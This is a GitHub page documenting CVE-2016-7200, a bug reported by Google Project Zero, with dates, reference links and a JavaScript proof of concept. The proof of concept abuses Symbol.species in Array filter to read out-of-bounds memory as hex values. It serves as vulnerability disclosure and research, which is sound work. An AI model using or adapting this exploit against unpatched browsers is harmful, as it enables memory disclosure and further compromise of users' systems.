CVE-2016-7200

Report: Sep 2016
Fix: Nov 2016
Credit: Natalie Silvanovich, Google Project Zero

PoC

var b = new Array(1,2,3);
var d = new Array(1,2,3);
d.length = 0x200000;
d.fill(7);
class dummy{
  constructor(){
    //alert("in constructor");
    return d;
  }
}

class MyArray extends Array {
  // Overwrite species to the parent Array constructor
  static get [Symbol.species]() {

    //alert("get");
    b[0] = {};
    return dummy;
  }
}

var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);

for(var i = 0; i < 0x200000; i++) {
  a[i] = i;
}

function test(i){
  return true;
}

a.__proto__ = MyArray.prototype;

var o = a.filter(test);
//alert(o);
var h = [];

for(item in o){
  var n = new Number(o[item]);
  if (n < 0){
    n = n + 0x100000000;
  }
  h.push(n.toString(16));
}

//alert(h);

Reference

Microsoft
Project Zero
Exploit by Theori
Fix

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2016-7200.md

CVE-2016-7200.md

CVE-2016-7200

PoC

Reference

Files

CVE-2016-7200.md

Latest commit

History

CVE-2016-7200.md

File metadata and controls

CVE-2016-7200

PoC

Reference